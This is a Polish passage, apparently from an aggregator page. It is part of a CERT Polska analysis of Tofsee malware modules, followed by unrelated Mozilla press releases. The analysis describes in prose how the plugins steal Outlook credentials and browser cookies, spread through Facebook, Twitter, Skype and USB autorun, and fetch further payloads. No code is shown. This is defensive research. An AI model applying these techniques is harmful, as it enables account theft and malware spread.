Złośliwa usługa jest obfuskowana „nowoczesnym algorytmem szyfrowania” – czyli każdy bajt jest negowany:

Md5 zdeszyfrowanego backdoora = 49642f1d1b1673a40f5fa6263a66d056. Ten backdoor jest chroniony przez packer i to jedyne zaobserwowane przez nas jego użycie podczas całego procesu analizy Tofsee – może to sugerować, że był stworzony przez innego aktora i później wykorzystany przez twórców Tofsee.

7. locsR.dll

Oryginalna nazwa pliku: z:\cmf5\cmf5\small2\plugins\plg_locs\plg.cpp

Ten plugin kradnie dane dostępowe do programu Microsoft Outlook:

Po wyciągnięciu ich z rejestru, są odszyfrowywane i wykorzystywane do wysłania większej liczby emaili. Dodatkowo, generuje adres email w postaci [nazwa komputera]@mail.run i próbuje wysłać emaile korzystając z niej (czystym protokołem SMTP).

Ciekawsze napisy z pliku:

10. hostR.dll

Plugin, który potrafi działać jako serwer HTTP. Przedstawia się Apache/2.2.15 (Win32). Może serwować pliki, prawdopodobnie dla innych botów (w połączeniu z pluginem p2p.dll).

Jest w stanie wykluczać niektóre IP – prawdopodobnie analityków bezpieczeństwa (np. całe zakresy adresowe Forcepoint i Google są zbanowane).

Pobrana z C&C konfiguracja dla tego modułu:

11. text.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_text\plg_text.cpp.

Bardzo prosty plugin, jest w stanie tylko przetwarzać szablony emaili pobranych z serwera C&C.

12. smtp.dll

Bardzo ważny moduł – generuje i wysyła emaile. Jest prawdopodobnie największym pluginem, a jego kod jest często skomplikowany.

Najciekawszą rzeczą w nim jest fakt, że do generowania wiadomości używa własnego dedykowanego języka skryptowego. Przykładowy skrypt otrzymany od C&C:

Jeśli ktoś jest w stanie rozpoznać ten język skryptowy, bardzo chętnie dowiedzielibyśmy się co jeszcze z niego korzysta. Jako że nie widzieliśmy wcześniej czegoś takiego, spróbowaliśmy przeanalizować interpreter tego języka.

Składnia jest raczej prosta, ale bardzo podobna do asemblera i prymitywna. Mamy nadzieję że autorzy malware generują ten skrypt z jakiegoś bardziej wysokopoziomowego języka, bo pisanie w takim czymś musi bardzo ranić zdrowie psychiczne programisty ;].

Wspieranych jest bardzo wiele opcodów – polecamy spojrzeć na tę uproszczoną funkcję parsującą jako przykład:

Nie przeanalizowaliśmy ich wszystkich, ale kilka najważniejszych to:

Dodatkowo, otoczenie tekstu w „”” pozwala na znaki nowej linii i escape sequences, a __v(XX)__ to interpolacja zmiennych.

Ponownie, kilka ciekawszych napisów, które można znaleźć w tym pliku:

Przez chwilę myśleliśmy, że IfYouAreReadingThisYouHaveTooMuchFreeTime to easter-egg dla nas, analityków malware – ale okazuje się że to tylko dziwny specjalny przypadek związany z logowaniem do hotmaila.

Konfiguracja, którą pobraliśmy dla tego modułu z C&C:

13. blist.dll

Ten plugin sprawdza czy bot znajduje się na listach spambotów. W konfiguracji, którą zaobserwowaliśmy, następujące DNSBL (DNS-based Blackhole List) były używane:

DNSBL to usługa bazująca na DNS, używana do publikowania adresów IP nadających spam. Jeśli serwer mailowy używa DNSBL, wykona żądanie DNS do domeny DNSBL z każdym nadchodzącym połączeniem SMTP. Techniczne detale tego rozwiązania są poza zakresem naszego posta, ale jeśli ktoś jest ciekawy może spojrzeć na http://www.us.sorbs.net/using.shtml albo https://en.wikipedia.org/wiki/DNSBL.

Sprawdzenie DNSBL w malware jest wykonywana za pomocą gethostbyname.

Konfiguracja modułu pobrana z C&C:

14. miner.dll

Jak sama nazwa wskazuje, jest to koparka kryptowalut. Ten plugin służy tylko do koordynacji pracy, ale ma kilka powiązanych programów, które wykonują całą „ciężką pracę”.

Jeden z programów, nazywany grabb, jest dystrybuowany prosto z C&C. Inne są pobierane z URLi zapisanych w konfiguracji – w teorii. W praktyce serwery dystrybuujące programy kopiące wyglądają na martwe, więc nie byliśmy w stanie ich pobrać.

Miner.dll weryfikuje że na pewno pobrał poprawny program, ale być może hashowanie było za trudne do zaimplementowania dla twórców, więc użyli prostszej metody – porównanie długości – na przykład, upewniają się że pobrany program cores_gt_1 ma dokładnie 223744 bajtów.

Nie analizowaliśmy tego pluginu bardzo dokładnie, bo koparki bitcoinów nie leżą w naszym obszarze zainteresowań, a napisy dały wystarczająco wiele informacji o tym co dzieje się w środku i tak:

A resztę można znaleźc w konfiguracji pobranej z C&C:

15. img.dll

Ten krótki plugin służy do przetwarzania złośliwych załączników – koduje je za pomocą algorytmu base64 i załącza do emaili.

Nie ma tu nic interesującego, jak widać w napisach zapisanych w kodzie:

Konfiguracja dla tego modułu pobrana z C&C.

16. spread.dll

Ten plugin jest wykorzystywany żeby rozprzestrzeniać Tofsee przez media społecznościowe: Facebooka, Twittera oraz komunikator Skype.

Najpierw wyciąga ciastka xs, datr, c_user (i więcej).

Dokładna metoda zależy od przeglądarki, ale generalnie wtyczka czyta ciastka zapisane na dysku przez przeglądarkę. Na przykład cookies.sqlite z \Mozilla\Firefox\Profiles dla Firefoxa. Wspierane przeglądarki to Chrome, IE, Firefox, Safari i Opera.

Następnie plugin używa tych ciastek np. żeby podszyć się pod użytkownika przed API Facebooka:

Lista przyjaciół jest pobierana przez API i wiadomość jest wysyłana do każdego z nich. Format wiadomości jest przechowywany w konfiguracji, na przykład:

‚fb.message1’: ‚%SPRD_TEXT1|%LANG_ID| %SPRD_URL1’

Twitter jest obsługiwany bardzo podobnie – ciastka są kradzione, followersi są pobierani przez API pod adresem https://twitter.com/followers, a następnie wysyłane są wiadomości.

Dodatkowo wspierane jest rosyjskie VKontakte, ale ta funkcja jest opcjonalna i trzymana w osobnym pluginie. Opisywany tu moduł sprawdza tylko czy VK jest włączony w konfiguracji i wywołuje odpowiedni handler (który musi być inicjalizowany z innego pluginu), jeśli jest zdefiniowany. Twórcy złośliwego oprogramowania zazwyczaj nie obierają na cel Rosji, więc ta funkcja jest wyłączona i moduł do Vkontakte nie jest rozpowszechniany.

Moduł może również rozprzestrzeniać się za pomocą Skype, ale analiza wsteczna protokołu Skype była widocznie za trudna, więc twórcy poszli na łatwiznę i wtyczka czeka, aż Skype zostanie uruchomiony, po czym wysyła wiadomości windowsowe do okna Skype:

Ten plugin ma dziesiątki zapisanych napisów, więc analiza w deasemblerze jest bardzo prosta. Kilka ciekawszych grup:

Referencje do pluginu OCR – żeby rozwiązywać Captchę:

Ciastka Facebooka:

Napisy związane z rozpowszechnianiem się przez Facebooka:

Napisy związane z kradzieżą ciasteczek:

Napisy związane z przechwytywaniem Skype:

Ciastka Twittera:

I rozpowszechnianie się przez Twittera:

Na koniec napisy związane z wysyłaniem ciasteczek:

Dużo funkcji oznacza dużo konfiguracji od C&C:

17. spread2.dll

Plugin stosujący metody sprzed ponad 15 lat – przenosić Tofsee przez… zainfekowane nośniki USB! Nie brzmi to jak dobra strategia w roku 2017, ale mimo to, jest on ciągle aktywny.

Najpierw złośliwy program jest kopiowany jako RECYCLER\<random_gibberish>.exe na nośnik USB, następnie są na nim ustawiane atrybuty READONLY i SYSTEM, a finalnie zapisywany jest złośliwy autorun.inf:

Złośliwy program, który będzie dystrybuowany, jest pobierany z Internetu (patrz również sys.dll i zmienna %FIREURL).

W napisach nie ma wiele ciekawego, poza logami:

A konfiguracja dla modułu jest dość uboga:

18. sys.dll

Ten plugin wygląda na downloader, albo raczej program aktualizujący. Wysyła on żądanie zależne od zawartości zmiennej %FIREURL w konfiguracji:

Przykładowe wartości %FIREURL (jeden na linię):

Zmienne są podmieniane rekursywnie, a %SYS_RN oznacza \r\n, więc pierwsza możliwa wartość powinna być traktowana jako:

Jeśli wyślemy to żądanie do odpowiedniego IP na porcie 80, otrzymamy kolejny złośliwy program. Różne żądania zwracają inne programy.

Jeśli żądanie jest niepoprawne, albo nie wspierane, zwracany jest następujący obraz:

Doceniamy poczucie humoru.

Nic zaskakującego w napisach:

Konfiguracja od C&C:

Dodatkowo używana jest zmienna %FIREURL z głównego modułu.

19. webb.dll

Ta wtyczka szuka procesu iexplore.exe. Jeśli znajdzie go, wstrzykuje do niego DLL IEStub.dll.

IEStub.dll przechwytuje bardzo dużo funkcji – lista:

Hooki przechwytują wołane funkcje i mogą nawet zmienić im parametry. Nie analizowaliśmy ich dokładnie, ale większość z nich to bardziej loggery, które tylko przechwytują interesujące dane z parametrów. Nie zaobserwowaliśmy żeby Tofsee serwowało jakiekolwiek web injecty.

Dla kompletności, interesujące napisy:

Konfiguracja dla tego modułu pobrana z C&C:

20. P2P.dll

Oryginalna nazwa pliku: p:\cmf5\small2\plugins\plg_p2p\plg_p2p.cpp

Ten plugin jest raczej krótki. Mimo że ma obiecującą nazwę, nie ma w nim wiele ciekawego – otwiera port na routerze i nasłuchuje połączeń. Nie implementuje żadnych poleceń, wszystko jest zostawione dla głównego modułu (albo pluginów, jak np. serwer HTTP).

Jak prawie każdy moduł, zapisuje logi do pliku %TMP%\log_%s.txt, a jeśli to się nie uda, to do C:\log.txt.

Dodaje również mapowanie portu używając UPnP, w taki sam sposób jak plugin 4 (proxyR.dll).

Konfiguracja otrzymana z C&C:

Interesujące napisy:

Artykuł Głębsze spojrzenie na moduły Tofsee pochodzi z serwisu CERT Polska.

Jarosław Jedynak, 19 października 2017, 11:36

17 października 2017

Centrum prasowe Mozilli

Tygodniowy festiwal dla lepszego internetu

Już za tydzień Mozilla organizuje spotkanie technologów, aktywistów i artystów, aby rozmawiać o największych problemach dotyczących internetu

Stan internetu zaczyna się pogarszać. Ataki ransomware, trollowanie i inwigilacja na szeroką skalę są zagrożeniem dla zdrowia internetu.

„Internet zagościł w naszym życiu w sposób, którego sobie wcześniej nie wyobrażaliśmy. Dostęp do sieci nie jest już dobrem luksusowym, a podstawą życia w XXI wieku. Wirusy to nie są już pojedyncze ostrzeżenia dotyczące jednego urządzenia. To realne zagrożenia, które mogą zakłócać pracę szpitali, rządów, jak i całych miast” – mówi Mark Surman, Executive Director w Mozilli.

Jest również wiele pozytywnych aspektów internetu. Każdego dnia tworzą się nowe społeczności niezależnie od odległości dzielących jej członków. Start-upy i artyści mają dostęp do globalnych zasobów, a projekty open-source stawiają innowację i integrację przed zyskami.

Chcąc naprawić to, co złe i uwidocznić to, co dobre, Mozilla ponownie organizuje MozFest, coroczny festiwal w Londynie i postanawia się zająć tymi kwestiami.

W październiku odbędzie się już 8. edycja wydarzenia, na które przybędzie prawie dwa tysiące technologów, hakerów i aktywistów z całego świata.

Podczas tegorocznego festiwalu odbędą się m.in.:

 

Więcej informacji o MozFest znajduje się na stronie: https://mozillafestival.org/.

 

 

Centrum prasowe Mozilli, 17 października 2017, 09:19

28 września 2017

Centrum prasowe Mozilli

Screenshots, Send Tabs i więcej! Dzisiejsze wydanie Firefoksa to nowe funkcje i dodatki dla wszystkich użytkowników

Nasz zespół badaczy pracujący z użytkownikami Firefoksa zauważył, że mają oni spore zasoby kreatywnych rozwiązań i pomysły na to, co przeglądarka mogłaby robić – jak np. sama do siebie wysyłać zrzuty ekranu i linki.

Naszym celem jest usprawnienie przeglądarki, tak aby codzienne zadania były jeszcze prostsze, więc uzbroiliśmy Firefoksa w nowe funkcje.

Zapisuj i dziel się ulubionymi stronami ze Screenshots

Sieć jest osobista – często strony, które odwiedzacie – od mediów społecznościowych, przez strony podróżnicze ze śmiesznymi reklamami, nie są łatwe do zapisania. Dzięki narzędziu Screenshots, zapisywanie i dzielenie się tym, co widzicie online to tylko jedno kliknięcie.

Narzędzie Screenshots było dostępne w naszym programie Test Pilot pod nazwą Page Shot i okazało się najczęściej pobieranym eksperymentalnym narzędziem w historii Test Pilot. Nasz zespół poświęcił dużo czasu pracując nad zrozumieniem tego, jak użytkownicy korzystają z tego narzędzia i jak usprawnić jego działanie. Dlatego Firefox Screenshots umożliwia zapisywanie i dzielenie się zrzutami ekranu bezpośrednio z przeglądarki.

Jak to działa?

Po pierwsze Screenshots umożliwia Ci zapisywanie zrzutów ekranu bez pobierania dodatkowego oprogramowania. Możesz zaznaczyć obszar, który chcesz zapisać lub pozwolić, aby Screenshots zrobił to za Ciebie. Najedź na obszar, który Cię interesuje i kliknij.

Możesz wybrać, które zrzuty ekranu chcesz zapisać i łatwo się do nich dostać z paska narzędzi. Firefox automatycznie zapisuje je w chmurze na okres dwóch tygodni, ale możesz zmienić ten przedział czasu lub usunąć je z biblioteki w każdej chwili. Możesz też podzielić się zrzutami ekranu z innymi – bez względu na to jakiego urządzenia lub przeglądarki używają. Spróbuj sam i przekonaj się, za co nasi testerzy tak bardzo polubili to narzędzie.

Koniec z wysyłaniem sobie linków! Send Tabs przychodzi na ratunek

Firefox daje użytkownikom sposób na szybsze dzielenie się treściami pomiędzy urządzeniami mobilnymi i stacjonarnymi. Nazywa się Send Tabs.

Send Tabs to najszybszy sposób na przesłanie każdej strony z oraz na przeglądarkę na komputerze czy urządzeniu mobilnym lub aplikacji. Oznacza to, że nie musisz już wysyłać sobie linków mailem! A Twoje dane są zaszyfrowane tak, że nawet Mozilla ich nie zobaczy.

Sprawdź sam:

Oszczędzaj czas z automatycznie uzupełniającym się formularzem

Uzupełnianie formularzy, bez względu na to czy kupujemy książkę czy przekazujemy środki finansowe, jest uciążliwe. Zaczynając od Stanów Zjednoczonych, stopniowo będziemy udostępniać funkcję automatycznego uzupełniania formularzy do wszystkich użytkowników naszej przeglądarki w wersji desktopowej.

Firefox pozwala użytkownikom na uzupełnienie formularzy z wieloma okienkami, dzięki szybkiemu wybieraniu z rozwijanego menu. Firefox automatycznie zapisze dane z pierwszego wypełnionego formularza, tak aby użytkownicy mogli użyć tych danych ponownie na innych stronach.

Użytkownicy mogą zachować wiele adresów: do pracy, domu, znajomych i rodziny. Zapisane adresy zsynchronizują się na wszystkich urządzeniach.

Pobierz najnowszą wersję Firefoksa lub wypróbuj Firefox Quantum w wersji Beta i sprawdź nowe funkcje. Aktualne wydanie przeglądarki przybliża nas do najszybszej wersji Firefoksa jak do tej pory – Firefox Quantum, która będzie dostępna od 14 listopada. Jeśli nie chcecie tyle czekać, możecie wypróbować wersję Beta. Nie zapomnijcie też o wypróbowaniu Screenshots – ikonka znajduje się w pasku narzędzi.

kornelia.gruszka, 28 września 2017, 17:09

26 września 2017

Centrum prasowe Mozilli

Włączcie silniki – Firefox Quantum w wersji Beta, edycja deweloperska

Silniki – zarówno te w samochodach, jak i w przeglądarkach – są bardzo ważne. Dlatego cieszymy się, że najnowszy Firefox w wersji beta jest wspomagany przez całkowicie unowocześniony silnik. A ponieważ sam numer najnowszego wydania – 57 – niewiele mówi o wielkości zmian, jakich dokonaliśmy, nową wersję nazywamy Firefox Quantum.

Droga do Firefox Quantum

W październiku zeszłego roku ogłosiliśmy Projekt Quantum, który miał na celu stworzenie silnika nowej generacji dla współczesnych komputerów, korzystając z technologii wypracowanych w ramach projektu Servo. Od tamtej pory nasz zespół inżynierów nieustannie skupiał się nad tym, żeby Firefox stał się nieporównywalnie szybki w działaniu.

W tym roku wprowadziliśmy do Firefoksa kilka ulepszeń, na przykład, działanie w oparciu o wiele procesów, znajdując właściwy balans między szybkością a zużyciem pamięci. Dodatkowo wprowadziliśmy funkcje takie jak WebAssembly i WebVR, umożliwiając szybsze działanie aplikacji webowych na komputerach stacjonarnych i zestawach VR.

Wiele zmian zostało już wprowadzonych, ale dla Firefox Quantum zaplanowaliśmy jeszcze więcej.

Szybsze działanie na najważniejszych stronach

Firefox Quantum jest dużym krokiem naprzód – odczujesz to przeglądając ulubione strony.

Szybkość działania Firefox Quantum może być zmierzona – nasz zespół lubi podejście oparte na danych. Jednym ze sposobów jest użycie Speedometer 2.0 (prace nad tym narzędziem jeszcze trwają), który symuluje współczesne aplikacje mobilne. Wyniki zależą od komputera i aplikacji, których używasz, ale jedną stałą rzeczą jest fakt, że Firefox Quantum jest około 2 razy szybszy niż Firefox rok temu.

Zachęcamy Was do samodzielnego przeprowadzenia porównania lub obejrzenia krótkiego wideo, w którym porównujemy Firefox Quantum i Chrome na różnych stronach. Firefox Quantum jest często znacznie szybszy.

Jak sprawiliśmy, że Firefox Quantum działa tak szybko?

Firefox do tej pory działał tylko na jednym procesorze, ale dzisiejsze wieloprocesorowe wydanie w wersji desktopowej i mobilnej działa bardziej efektywnie. Przykład? Opracowaliśmy przełomowe podejście do układania stron: szybki silnik CSS napisany w Rust, języku programowania systemów, który wprowadziła Mozilla. Nowy silnik CSS w Firefoksie działa szybko i równolegle na wielu rdzeniach procesora, zamiast uruchamiania jednej wolniejszej sekwencji na jednym rdzeniu. Żadna inna przeglądarka tak nie działa.

Od teraz karta, której używasz w danym momencie otwiera się przed innymi kartami, działającymi w tle. Dzięki temu Firefox Quantum często wypada lepiej w testach niż Chrome, zużywając tylko 30% RAM-u.

Dodatkowo, w ciągu kilku ostatnich miesięcy przeprowadziliśmy kilka testów, aby wyłapać wszelkie błędy w działaniu. Do tej pory udało nam się rozwiązać 468 małych i dużych błędów.

Przedstawiamy szybki i płynny Photon

Nie liczą się tylko testy prędkości, ważne jest również, aby nasi użytkownicy czuli, że korzystają z dobrze przemyślanego produktu. Aby pokazać wszystkie na pozór niewidoczne ulepszenia, zmieniliśmy wygląd Firefoksa opierając się na naszym projekcie – Photon. Nasz utalentowany zespół projektantów poświęcił wiele czasu na zrozumienie jak użytkownicy postrzegają przeglądarki.

Nowy interfejs Firefoksa odzwierciedla potrzeby użytkowników, którzy są bardziej zadaniowi, niż kiedyś. Jesteśmy pewni, że dzięki Photon, Firefox Quantum zaimponuje im nowoczesnym designem. Photon nie tylko dobrze wygląda, jest też inteligentniejszy – używając go na komputerze Windows z dotykowym ekranem, rozmiar menu zmienia się w zależności od tego, czy klikasz myszką czy palcem.

Nowy, minimalistyczny design składa się z kwadratowych kart, płynnie działających animacji i Biblioteki, która zapewnia szybki dostęp do zakładek, aplikacji Pocket, historii, pobranych dokumentów i screenshotów. Firefox Quantum działa z systemami operowanymi dotykowo – Windows 10, macOS High Sierra, Android Oreo i iOS 11.

Wbudowany Pocket

Firefox Quantum to lepsza integracja Firefoksa z aplikacją Pocket, którą Mozilla przejęła w zeszłym roku. Otwierając nową kartę zobaczysz treści polecane przez Pocket obok twoich ulubionych stron. Jednym kliknięciem zachowasz w aplikacji interesujące treści. Aplikacja Pocket na iOS lub Androida umożliwi dostęp offline do zachowanych treści w każdej chwili.

Uaktualnij swoją przeglądarkę do Firefox Quantum wkrótce lub pobierz wersję Beta dzisiaj

Jeśli należysz do naszych wiernych użytkowników, Twoja przeglądarka zaktualizuje się automatycznie 14 listopada. Możesz też już dziś wypróbować wersję Beta na komputerze stacjonarnym, urządzeniach z Androidem lub iOS. Deweloperzy mogą pobrać deweloperską edycję, w której dostępne są nowe narzędzia.

Firefox zmieniał się na przestrzeni ostatnich lat, a dużo nowości jeszcze przed nami. Aby być na bieżąco z informacjami o Firefox Quantum odwiedźcie naszą stronę.

Cieszymy się, że nasi użytkownicy beta będą mogli korzystać z Firefox Quantum i mamy nadzieję, że i Wy spróbujecie.

kornelia.gruszka, 26 września 2017, 14:51

21 września 2017

Centrum prasowe Mozilli

Ochrona przed śledzeniem w Firefoksie na iOS oraz Multi-Tasking w Firefox Focus na Androida

Nick Nguyen,  21 września 2017

Wrzesień obfituje w nowości w branży mobilnej.

Dziś oddajemy w wasze ręce najnowszą wersję Firefoksa na iOS oraz Firefox Focus na Androida, który swoją premierę miał w czerwcu.

Co nowego w Firefoksie na iOS:

Ochrona przed śledzeniem: po raz pierwszy użytkownicy iOS11 na iPhonie oraz iPadzie mogą korzystać z opcji automatycznego blokowania reklam w trybie prywatnego przeglądania oraz z ochrony przed śledzeniem w trakcie regularnego przeglądania. Funkcja ta używa tej samej technologii, która została wykorzystana w Firefox Focus na Androida i iOS, Firefoksie w wersji desktopowej i Firefoksie na Androida. Zawsze staramy się udostępniać naszym użytkownikom najnowsze funkcje i nareszcie możemy podzielić się nimi w Firefoksie na iOS, a to wszystko dzięki zmianom jakie wprowadził Apple dla wszystkich przeglądarek.

Ulepszona Synchronizacja: nasi użytkownicy do tej pory mieli możliwość zsynchronizowania danych takich jak hasła, historia czy zakładki do wersji mobilnej. Od teraz działa to też w drugą stronę, umożliwiając synchronizację danych z telefonu z wersją desktopową.

Pobierz najnowszą wersję Firefoksa na iOS.

Nowości w Firefox Focus na Androida:

Nowa funkcja kart: mimo, że główną cechą Firefox Focus jest prostota, posłuchaliśmy waszego zdania i polepszyliśmy jakość prywatnego przeglądania. Od teraz użytkownicy mogą korzystać z kilku zakładek w tym samym czasie, swobodnie poruszając się między przeglądanymi stronami.

Pobierz Firefox Focus na Androida ze sklepu Google Play.

Wypróbujcie i dajcie znać, co sądzicie.

kornelia.gruszka, 21 września 2017, 13:41

11 września 2017

Centrum prasowe Mozilli

Głosowanie nad prawem autorskim, które może zmienić europejski Internet

10 października prawodawcy Unii Europejskiej zagłosują nad niebezpiecznym wnioskiem o zmianę prawa autorskiego. Mozilla nakłania obywateli UE, aby żądali lepszych reform.

Mozilla

10 października Komisja Prawna (JURI) Parlamentu Europejskiego zagłosuje nad wnioskiem o zmianę unijnego prawa autorskiego.

Wynik tego głosowania może zagrozić wolności i otwartości w Internecie. Może dalece upowszechnić filtrowanie i blokowanie treści, wpływając na życie setek milionów obywateli UE, którzy codziennie korzystają z Internetu.

Dlaczego reforma prawa autorskiego jest tak ważna?

Obecne unijne prawo autorskie jest przestarzałe. Zostało ono napisane w czasach, gdy nie komórka, a pocztówka była najpowszechniejszą metodą komunikacji.

Unijny wniosek o reformę tego prawa jest pod wieloma względami krokiem w tył. „Dyrektywa w sprawie praw autorskich na jednolitym rynku cyfrowym” zostanie poddana głosowaniu wstępnemu 10 października, a w grudniu będzie miało miejsce głosowanie ostateczne.

— Wiele aspektów wniosku i część poprawek złożonych w Parlamencie jest dysfunkcyjnych i na granicy absurdu — powiedziała Raegan MacDonald, Senior EU Policy Manager Mozilli. — Wniosek sprawiłby, że filtrowanie i blokowanie treści w Internecie stałoby się normą, skutkując osłabieniem innowacji, konkurencji i wolności wypowiedzi.

Jeśli wniosek stanie się prawem:

Rola Mozilli

W ciągu tygodni przed głosowaniem Mozilla nakłania obywateli UE, aby zadzwonili do swoich prawodawców i zażądali lepszej reformy. Nasza witryna i narzędzie do połączeń telefonicznych — changecopyright.org — ułatwia kontakt z europosłankami i europosłami.

To nie pierwszy raz, gdy Mozilla upomina się o zdroworozsądkową reformę prawa autorskiego dla ery internetowej. Na początku roku w ramach protestu Mozilla i ponad sto tysięcy obywateli UE zrzuciło dziesiątki milionów wirtualnych ulotek na znane europejskie budynki. W 2016 r. zebraliśmy ponad sto tysięcy podpisów nawołujących do reformy.

Wyważona, elastyczna i przyjazna kreatywności reforma prawa autorskiego jest niezbędna dla zdrowego Internetu. Jeśli się zgadzasz, wejdź na changecopyright.org i wyraź swoje zdanie.

kornelia.gruszka, 11 września 2017, 07:36

8 sierpnia 2017

Centrum prasowe Mozilli

Firefox jeszcze lepszy. WebVR i nowe funkcje przyspieszające działanie od dziś dostępne w Firefoksie

Nick Nguyen, 8 sierpnia 2017

Pewnie zauważyliście już, że ciężko pracujemy nad tym, żeby Firefox był szybszy i lepszy niż kiedykolwiek. Dziś przekazujemy Wam nasze najlepsze jak do tej pory wydanie, w którym dostępne są technologie dla twórców oraz udogodnienia poprawiające jakość korzystania z przeglądarki dla wszystkich użytkowników.

Zobaczmy, co nowego znajdziecie w dzisiejszym wydaniu:

WebVR otwiera zupełnie możliwości dla WWW

Poza nową, super szybką i wieloprocesową bazą, wprowadzamy przełomową funkcję, dzięki której korzystanie z sieci wkracza na zupełnie nowy poziom. Firefox na Windowsa jest pierwszą desktopową przeglądarką, która wspiera WebVR dla wszystkich użytkowników, umożliwiając doświadczenie rozrywki kolejnej generacji w wirtualnej rzeczywistości.

WebVR pozwala deweloperom i artystom tworzyć w VR, a użytkownicy mogą przeglądać te treści za pomocą Firefoksa. Niezależnie od tego, czy masz już Oculus Rift lub HTC Vive – lub ciągle jesteś niezdecydowany – Firefox przybliża Cię do korzystania z rozwiązań VR. Kiedy znajdziesz grę lub aplikację, która wspiera VR, wystarczy kliknąć na ikonkę gogli widoczną na stronie. Możesz nawigować i kontrolować wirtualną rzeczywistość przy pomocy kontrolerów i własnych ruchów.

Jeśli jesteś gotowy na wypróbowanie wirtualnej rzeczywistości w Firefoksie, rosnąca społeczność twórców zaczęła już dodawać treści dzięki WebVR. Odwiedź vr.mozilla.org aby zobaczyć treści zbudowane przy użyciu A-Frame, wygodnego frameworka do tworzenia w wirtualnej rzeczywistości. Nasz ulubiony to A Painter. Nie byłoby to możliwe bez wsparcia i ciężkiej pracy zespołu Mozilla VR, który ściśle współpracował z partnerami z branży, twórcami przeglądarek i deweloperami. Jeśli chciałbyś dowiedzieć się więcej, przeczytaj blog post Seana White’a na Medium.

Panel wydajności – dostosuj ustawienia

Dzięki wieloprocesowej architekturze, Firefox może z łatwością obsługiwać skomplikowane strony, szczególnie kiedy masz otwartych kilka takich stron jednocześnie. Opracowaliśmy optymalne rozwiązanie dla większości urządzeń, ale jeśli lubicie sami szperać w ustawieniach, możecie dopasować procesy do swoich upodobań. Ustawienia znajdziecie na dole sekcji Główne w Opcjach.

Wskazówka: jeśli Twój komputer ma dużo RAM-u (na przykład 8GB) możesz zwiększyć liczbę procesów z 4 fabrycznie ustawionych w Firefoksie. To sprawia, że Firefox działa jeszcze szybciej, mimo, że zużywa więcej pamięci. W naszych testach na Windowsa 10, Firefox zużywa mniej pamięci niż Chrome, nawet z 8 działającymi procesami.

Szybszy start przy dużej liczbie kart

Jesteś zbieraczem kart? Jako część naszego projektu Quantum Flow, który ma zwiększyć wydajność, znacząco zredukowaliśmy czas, jaki potrzebny jest do włączenia przeglądarki, kiedy macie zapisane karty z poprzedniej sesji. O ile szybciej jest teraz? Dietrich Ayala, członek naszej społeczności przeprowadził interesujący eksperyment, porównując, ile czasu zajmuje otwarcie różnych wersji Firefoksa, z otwartymi 1 691 kartami. Wynik? To, co wcześniej zajmowało prawie 8 minut, teraz zajmuje 15 sekund.

Szybszy i bardziej stabilny Firefox dla 64-bitowego Windowsa

Jeśli korzystasz z 64-bitowej wersji Windowsa (sprawdź tu), powinieneś dzisiaj ściągnąć i ponownie zainstalować Firefoksa, ponieważ nowe wydanie to 64-bitowa wersja przeglądarki, która jest mniej podatna na utratę pamięci i przerwę w działaniu. Z naszych testów wynika, że 64-bitowa wersja redukuje błędy o 39% na urządzeniach z 4GB RAM-u.

Jeśli nie przeprowadzasz aktualizacji ręcznie, nie martw się. Mamy w planach automatyczne przekierowanie użytkowników 64-bitowego Windowsa do 64-bitowego Firefoksa w kolejnym wydaniu.

Szybsze wyszukiwanie

Codziennie czegoś szukamy – wiedzy z Wikipedii, wymarzonego produktu na Amazonie albo wideo na YouTubie.

Nowe wydanie Firefoksa umożliwia szybkie przeszukiwanie wielu stron prosto z pola do wpisywania adresu strony. Wpisz swoje pytanie, a potem wybierz wyszukiwarkę, z której chcesz skorzystać.

 

Możesz wybierać między Yahoo, Google, Bing, Amazonem, DuckDuckGo, Twitterem i Wikipedią. Możesz też dostosować listę do własnych potrzeb w Ustawieniach.

Jeszcze więcej

Poniżej lista jeszcze kilku interesujących ulepszeń:

Jak zawsze, możesz przeczytać wszystko w informacjach o wydaniu, a deweloperzy mogą przeczytać więcej o nowych API na blogu Hacks.

Pracujemy nad kolejnymi usprawnieniami!

kornelia.gruszka, 8 sierpnia 2017, 13:13

26 lipca 2017

Centrum prasowe Mozilli

Plan wsparcia Flasha przez Firefoksa

Firma Adobe ogłosiła wczoraj, że do końca roku 2020, przestanie wspierać Flasha. Współpracując z Adobe i innymi producentami przeglądarek, Mozilla przygotowała plan wsparcia Flasha przez Firefoksa w tym okresie, który ułatwi użytkownikom odejście od tej technologii.

Więcej informacji: http://bit.ly/Flash_Firefox

 

kornelia.gruszka, 26 lipca 2017, 06:50

20 lipca 2017

Centrum prasowe Mozilli

Firefox Focus dla Androida ma już milion pobrań! Dzisiaj wprowadzamy trzy nowe funkcje zgłoszone przez użytkowników

Od uruchomienia Firefoksa Focus dla Androida minął niespełna miesiąc, a już ponad million użytkowników zdążyło pobrać naszą szybką i wygodną aplikację przeglądarki. Dziękujemy za ogromne wsparcie dla Firefox Focus dla Androida. To pokazuje, że użytkownicy chcą decydować o ustawieniach prywatności – zwłaszcza w kwestii danych osobowych i tego, w jaki sposób korzystają z Internetu.

Wprowadzenie w zeszłym roku Firefox Focus dla iOS oparte było na założeniu, że każdy ma prawo do ochrony prywatności. Tworząc Firefox Focus dla Androida, umożliwiliśmy to wszystkim użytkownikom mobilnym i daliśmy im kontrolę nad zarządzaniem tym, jak korzystają z Internetu na różnych platformach.

W ciągu tygodnia od uruchomienia Firefox Focus dla Androida, otrzymaliśmy ponad 8 000 komentarzy, a sama aplikacja została oceniona na 4.5 gwiazdek. Byliśmy zaskoczeni reakcją użytkowników!

Feedback od użytkowników Firefox Focus


„Niesamowita przeglądarka Firefox jest teraz jeszcze bardziej skupiona na prywatności i bezpieczeństwie.”

 „Wspaniała! Jest rzeczywiście bardzo lekka i szybka.”

 „Jest to bez wątpienia najlepsza przeglądarka, którą należy ustawić jako domyślną. Super szybka i super lekka.”

 „Doskonale sprawdza się w tym, do czego została stworzona, czyli do szybkiego, bezpiecznego, prywatnego i wygodnego przeglądania Internetu.”

 

Nowe funkcje

Z każdym nowym wydaniem staramy się wprowadzać usprawnienia, a wasze komentarze pomagają nam w ulepszaniu naszych produktów. Wspólnie zastanowiliśmy się, co możemy szybko dodać i już dziś możemy Was poinformować o nowych funkcjach:

Naszą misją jest tworzenie produktów, które spełniają potrzeby użytkowników. Odpowiadając na Wasze szybkie i trafne komentarze, chcemy Wam podziękować i pokazać, że są dla nas ważne.

Nowa wersja przeglądarki Firefox Focus jest już dostępna w Google Play i App Store.

Powiadomienia:

kornelia.gruszka, 20 lipca 2017, 14:05

